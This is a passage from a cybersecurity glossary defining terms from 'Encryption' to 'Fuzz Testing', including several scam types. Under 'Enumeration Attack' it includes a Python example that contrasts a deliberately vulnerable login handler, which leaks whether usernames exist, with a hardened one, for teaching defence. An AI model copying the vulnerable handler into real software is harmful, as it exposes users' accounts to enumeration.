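A mismatched Return-Path is not proof of spoofing on its own (legitimate bulk senders use separate bounce domains), which is why the result is reported as findings for an analyst rather than a verdict; combined with a Reply-To on a look-alike domain and an origin host that is not one of the claimed domain's mail servers, it is the pattern behind most BEC attempts.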
Employment/Training Scams – This type of scam can come in many forms but has the same purpose as any other. Finding a Master’s degree for less than $199 is very unlikely to happen. People have paid for expensive courses, CV services or simply jobs that don’t exist. The people most likely to be targeted by these kinds of scams are aged between 18 and 24.
Encipher – This is a process to convert plain text to cipher text via a cryptographic system.
Encryption – This is a mathematical/algorithmic method that obscures data’s true form by making it unreadable to anyone who does not know how it was encrypted. Encryption is used in https browser requests, and in securing communications and hardware from data extraction by hackers.
Encrypted DNS – There are various forms of encryption for DNS as follows (see appropriate definitions for details):
- DNS over TLS (DoT)
- DNS over HTTPS (DoH).
End Point – Any device that can connect to a network is termed an “endpoint”: desktops, laptops, tablets, smartphones and, more recently, IoT devices. Endpoints are now exposed to ransomware, phishing, malicious advertisements, software subversion and other attacks, not to mention zero-day attacks, which use previously unidentified vulnerabilities to deliver malicious programs to endpoint computers.
End Point Protection – This refers to a system for network security management that focuses on network endpoints, or individual devices such as workstations and mobile devices from which a network is accessed. The term also describes specific software packages that address endpoint security including suites of security software provided by many security companies (e.g. AVG, Symantec, McAfee, Kaspersky). Endpoint protection may also be called endpoint security.
Entropy – (or information entropy) is the average rate at which information is produced by a stochastic source of data. There is a very good Wikipedia page if you want to find out more, but it does get very mathematical. Entropy is often used as a measure of how hard a password is to guess in a brute force attack.
Enumeration Attack – Web applications with password and login authentication typically include several components that interact with the user database: the login window (for obvious reasons), the registration form (to avoid duplication of user names), and the password reset page (to make sure that the corresponding account exists). If Web developers do not implement these features securely enough, attackers may be able to use them to determine if a certain username exists in the database.
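What "implementing these features securely enough" looks like for the login and password-reset endpoints named above, as an added example that is not from the glossary: a login handler that leaks account existence through its error messages and an early return, next to one that answers identically and does the same amount of password-hashing work whether or not the username exists. The user store, passwords and work factor are constructed for the illustration.

```python
# Added example (not from the glossary): a login handler that leaks whether
# a username exists, next to one that answers identically either way.
# The user store, passwords and PBKDF2 work factor are constructed.
import hashlib
import hmac
import os
from typing import Dict, Tuple

ITERATIONS = 50_000   # PBKDF2 work factor (assumed for the example; tune for production)
GENERIC_ERROR = "Invalid username or password"


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_user(password: str) -> Dict[str, bytes]:
    salt = os.urandom(16)
    return {"salt": salt, "hash": hash_password(password, salt)}


# Constructed user database: username -> {salt, hash}
USERS: Dict[str, Dict[str, bytes]] = {"alice": make_user("correct horse battery staple")}

# Decoy record so that an unknown username costs the same hashing work as a
# known one; its password is random and never matches.
_DECOY = make_user(os.urandom(16).hex())


def vulnerable_login(username: str, password: str) -> Tuple[bool, str]:
    """Leaks account existence: distinct messages, and no hashing for unknown users."""
    user = USERS.get(username)
    if user is None:
        return False, "Unknown user"            # caller learns the name is unused
    if not hmac.compare_digest(hash_password(password, user["salt"]), user["hash"]):
        return False, "Wrong password"          # caller learns the name exists
    return True, "Welcome"


def hardened_login(username: str, password: str) -> Tuple[bool, str]:
    """Same message and same work whether or not the username exists."""
    exists = username in USERS
    user = USERS[username] if exists else _DECOY   # always hash against something
    digest = hash_password(password, user["salt"])
    # Constant-time comparison; '&' rather than 'and' so both operands are evaluated.
    ok = hmac.compare_digest(digest, user["hash"]) & exists
    return (True, "Welcome") if ok else (False, GENERIC_ERROR)


def password_reset_response(username: str) -> str:
    """The reset endpoint must not confirm existence either: send the email only
    when the account exists, but return the same text regardless."""
    return "If that account exists, a reset link has been sent."


if __name__ == "__main__":
    for name in ("alice", "nobody"):
        print(name, vulnerable_login(name, "guess"), hardened_login(name, "guess"))
```

The registration form needs the same treatment (for example, confirming sign-ups by email rather than reporting "username already taken"), and rate limiting on all three endpoints closes the remaining channel, which is the number of attempts an attacker can make.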
Exploit – This refers to a vulnerability, or bug, in software or hardware that can be used by hackers to execute some form of cyber attack.
Exploit Code – This is a computer program that allows attackers to automatically break into a system.
Exploitable Channel – This is a channel that allows the violation of the security policy governing an information system and is usable or detectable by subjects external to the trusted computing base. An example is a system vulnerability or zero-day.
External Drive – This is a disk drive that typically resides outside of a computer and connects to it by a USB connection. They can contain both normal HDD/spinning disk drives and solid state drives (SSD). They also come in many sizes, can have a completely enclosed disk drive or, in some cases, a removable disk drive. They are very useful for storing backups as well as extending the storage capacity of PCs.
External Security Testing – This is security testing conducted from outside the organization’s security perimeter. It is often called Black Box Security Testing as the testers typically don’t have knowledge of the internal network.
Fail Safe – This is the automatic protection of programs and/or processing systems when hardware or software failure is detected. This typically results in a no-harm scenario where all assets remain secured.
Failover – This is a system’s capability to switch over automatically, without any warning or human intervention, to a redundant or standby information system upon the failure or abnormal termination of the previously active system. Data centres often have a failover data centre in a different location that would not be affected by an outage due to environmental or other effects. In this way a company can automatically recover processing capabilities with minimal disruption.
Fake prizes / Unexpected Winnings Scams – This is where you receive an email (IM or SMS) claiming that you have won a prize, but you don’t remember participating in any contest. You are often required to submit your bank details or a credit/debit card to recover your prize, which then results in identity theft or some other fraud.
Fake / Non-existing Goods Scam – This is where you visit a fake webshop and buy goods that are never delivered. Moreover, counterfeit goods sold online are increasing significantly, and the majority of such goods come from China even though the website states it is based in the UK, the US or another country with strong protection against counterfeits.
File-less Malware – This is a form of malware that exists purely in memory (RAM) and does not persist itself by dropping files to a file system or infecting existing files. This is a typical form of infection for routers and embedded systems that do not have a read/write filesystem. Normally a simple reboot of the infected system is enough to wipe the malware; however, this does not close the vulnerability, as the malware can simply re-infect its host using the same attack vector and vulnerabilities unless these can be patched.
File Transfer Protocol (FTP) – This is an internet protocol for transferring files from one computer to another in a network using TCP/IP. This is typically unencrypted and has in most contexts been superseded by ‘Secure File Transfer Protocol’ (SFTP), which does use end-to-end encryption.
Financial Crimes Enforcement Network (FinCEN) – This is a US agency whose mission is to combat money laundering and connected crimes including terrorism, and to safeguard national security by collecting, analysing and sharing financial intelligence with dozens of intelligence agencies including the DEA, the FBI, the IRS and the U.S. Secret Service. See their website here.
Firewall – This is often a combination of hardware and software that uses a defined set of rules to constrain network traffic and to prevent unauthorised access to or from a network.
Flaw Hypothesis Methodology – This is the system analysis and penetration testing technique in which the specification and documentation for an information system are analyzed to produce a list of hypothetical flaws. This list is prioritized on the basis of the estimated probability that a flaw exists, on the ease of exploiting it, and on the extent of control or compromise it would provide. The prioritized list is used to perform penetration testing of a system.
Fleeceware – This is a form of fraud where you install an app that abuses the ability to offer trial periods to users before their accounts are charged. When a user signs up for an app trial period, they have to manually cancel the trial to avoid being charged. Most users just uninstall apps they don’t like and the majority of app developers take this as a sign that they wish to cancel the trial period without being charged. However some continue to charge the premium subscription charges.
Flooding – This is a Denial of Service attack that attempts to cause a failure in a system by providing more input than the system can process properly.
Forensic Examination – This is the investigation to evaluate, analyse, organise, preserve and document evidence, including digital evidence, that helps identify the cause of a cyber incident.
Forensic Specialist – This is a professional who locates, identifies, collects, analyses and examines computer forensic data while preserving the integrity and maintaining a strict chain of custody of the information discovered.
Forensically Clean – This describes digital media that is completely and irretrievably wiped of all data, including nonessential and residual data, scanned for malware, and verified completely blank before use.
Form Jacking Fraud – Also known as digital or web skimming, this scam is basically an evolution of ATM skimming. Criminals steal customers’ card details by adding their own code to a company’s website, which means they can see the card information as it’s being entered.
Fraud – In law, fraud is intentional deception to secure unfair or unlawful gain, or to deprive a victim of a legal right. Fraud can violate civil law (i.e., a fraud victim may sue the perpetrator to avoid the fraud or recover monetary compensation) or criminal law (i.e., a fraud perpetrator may be prosecuted and imprisoned by governmental authorities), or it may cause no loss of money, property or legal right but still be an element of another civil or criminal wrong. The purpose of fraud may be monetary gain or other benefits, for example obtaining a passport, travel document, or driver’s licence, or mortgage fraud, where the perpetrator attempts to qualify for a mortgage by way of false statements.
Free WiFi – This is a wireless network that is normally offered free of charge in coffee shops, hotels and other public places. There are a number of dangers in using these facilities, but by taking the correct precautions they can be used in relative safety. See our blog post on Using Free and Public WiFi.
Full Backup – This is a backup of all the files that you need to keep copies of. It is typically slow to make, since you are copying a significant amount of data. However, it does give you a snapshot in time from which you can recover your files (together with any later incremental backups) to the most recent state. See also our blog post on Backing up your data.
Full Disk Encryption – This is the process of encrypting all the data on the hard disk drive, including the computer’s operating system, and permitting access to the data only after successful authentication with the full disk encryption product. Using this ensures that even if a disk is removed from a system, it will be unreadable without the appropriate decryption keys. All mobile devices should use full disk encryption.
Fuzz Testing – This is an automated testing technique for uncovering programming errors in software. Also called Fuzzing.